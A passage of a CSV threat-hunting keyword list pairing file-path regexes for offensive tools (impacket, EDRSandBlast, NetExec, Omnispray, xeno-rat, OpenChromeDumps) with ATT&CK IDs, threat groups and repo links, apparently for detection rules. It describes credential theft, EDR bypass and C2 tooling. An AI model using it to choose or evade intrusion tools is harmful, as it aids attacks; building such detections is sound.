T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","16986" "*\ntdlol.txt*",".{0,1000}\\ntdlol\.txt.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","16987" "*\ntdsuseraccount.py*",".{0,1000}\\ntdsuseraccount\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - 
T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","16988" "*\ntdsutil.py*",".{0,1000}\\ntdsutil\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16989" "*\ntfs-read.py*",".{0,1000}\\ntfs\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16990" "*\NTHASH-FPC\*",".{0,1000}\\NTHASH\-FPC\\.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 
- T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","16991" "*\ntlm.py*",".{0,1000}\\ntlm\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16992" "*\ntlmdecoder.py*",".{0,1000}\\ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","16993" "*\ntlmdecoder.py*",".{0,1000}\\ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","16994" "*\NTLMRelay2Self*",".{0,1000}\\NTLMRelay2Self.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","Another No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","N/A","10","5","400","42","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z","16995" "*\NtlmRelayToEWS\*",".{0,1000}\\NtlmRelayToEWS\\.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","16996" "*\ntlmrelayx.exe*",".{0,1000}\\ntlmrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g.
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16997" "*\ntlmrelayx.exe*",".{0,1000}\\ntlmrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16998" "*\ntlmrelayx.py*",".{0,1000}\\ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16999" "*\ntlmrelayx.py*",".{0,1000}\\ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","0","N/A","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","17000" "*\NtlmThief\*",".{0,1000}\\NtlmThief\\.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","17001" "*\ntlmutil.py*",".{0,1000}\\ntlmutil\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","17002" "*\ntlmv1.py*",".{0,1000}\\ntlmv1\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17003" 
"*\NtoskrnlOffsets.csv*",".{0,1000}\\NtoskrnlOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","17004" "*\NtRemoteLoad.exe*",".{0,1000}\\NtRemoteLoad\.exe.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","17005" "*\NtRemoteLoad.sln*",".{0,1000}\\NtRemoteLoad\.sln.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","17006" "*\NtRights\*",".{0,1000}\\NtRights\\.{0,1000}","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","0","N/A","N/A","7","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","17007" "*\Nuages_Cli*",".{0,1000}\\Nuages_Cli.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","17008" "*\nxc.exe*",".{0,1000}\\nxc\.exe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a 
post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17009" "*\nxc\parsers\ip.py*",".{0,1000}\\nxc\\parsers\\ip\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17010" "*\nxc\parsers\nmap.py*",".{0,1000}\\nxc\\parsers\\nmap\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17011" "*\o365_enum_activesync.py*",".{0,1000}\\o365_enum_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17012" "*\o365_enum_office.py*",".{0,1000}\\o365_enum_office\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - 
TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17013" "*\o365_enum_onedrive.py*",".{0,1000}\\o365_enum_onedrive\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17014" "*\o365_spray_activesync.py*",".{0,1000}\\o365_spray_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17015" "*\o365_spray_adfs.py*",".{0,1000}\\o365_spray_adfs\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17016" "*\o365_spray_msol.py*",".{0,1000}\\o365_spray_msol\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17017" "*\o365spray.py*",".{0,1000}\\o365spray\.py.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - 
T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","17018" "*\Obfuscar.Console.exe*",".{0,1000}\\Obfuscar\.Console\.exe.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","17019" "*\obfuscate_strings.py*",".{0,1000}\\obfuscate_strings\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","17020" "*\Obfuscated_Command.txt*",".{0,1000}\\Obfuscated_Command\.txt.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","17022" "*\Obfuscated-Code.py*",".{0,1000}\\Obfuscated\-Code\.py.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","17023" "*\ObfuscatedSharpCollection*",".{0,1000}\\ObfuscatedSharpCollection.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","17024" "*\obfuscation.exe --help*",".{0,1000}\\obfuscation\.exe\s\-\-help.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17025" "*\obfy-1.0.zip*",".{0,1000}\\obfy\-1\.0\.zip.{0,1000}","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027 - T1064 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","0","N/A","N/A","N/A","7","678","97","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z","17026" "*\oem\Desktop\backdoor*",".{0,1000}\\oem\\Desktop\\backdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","17027" "*\OffensiveCpp\",".{0,1000}\\OffensiveCpp\\","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - 
T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","17028" "*\OffensiveCpp-main*",".{0,1000}\\OffensiveCpp\-main.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","17029" "*\OffensiveCSharp\*",".{0,1000}\\OffensiveCSharp\\.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","17030" "*\OffensiveCSharp-master\*",".{0,1000}\\OffensiveCSharp\-master\\.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17031" "*\Offensive-Netsh-Helper\*",".{0,1000}\\Offensive\-Netsh\-Helper\\.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an 
evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","17032" "*\Offensive-Netsh-Helper-master*",".{0,1000}\\Offensive\-Netsh\-Helper\-master.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","17033" "*\OfficeInjector.exe*",".{0,1000}\\OfficeInjector\.exe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","17034" "*\OfficePersistence.ps1*",".{0,1000}\\OfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","17035" "*\OfflineKeyloggerPipe*",".{0,1000}\\OfflineKeyloggerPipe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","named pipe","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","17036" "*\oh365userfinder.py*",".{0,1000}\\oh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","17039" "*\omnispray.py*",".{0,1000}\\omnispray\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17040" "*\Omnispray-main*",".{0,1000}\\Omnispray\-main.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17041" "*\onesixtyone.py*",".{0,1000}\\onesixtyone\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","17042" 
"*\online_brute.gz*",".{0,1000}\\online_brute\.gz.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","0","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","17043" "*\openchromedumps.exe*",".{0,1000}\\openchromedumps\.exe.{0,1000}","offensive_tool_keyword","OpenChromeDumps","OpenChrome Dump used with GrabChrome for credential access","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Yanluowang - Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17045" "*\openChromeDumps.pdb*",".{0,1000}\\openChromeDumps\.pdb.{0,1000}","offensive_tool_keyword","OpenChromeDumps","OpenChrome Dump used with GrabChrome for credential access","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Yanluowang - Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17046" "*\OperaPassView.chm*",".{0,1000}\\OperaPassView\.chm.{0,1000}","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17049" 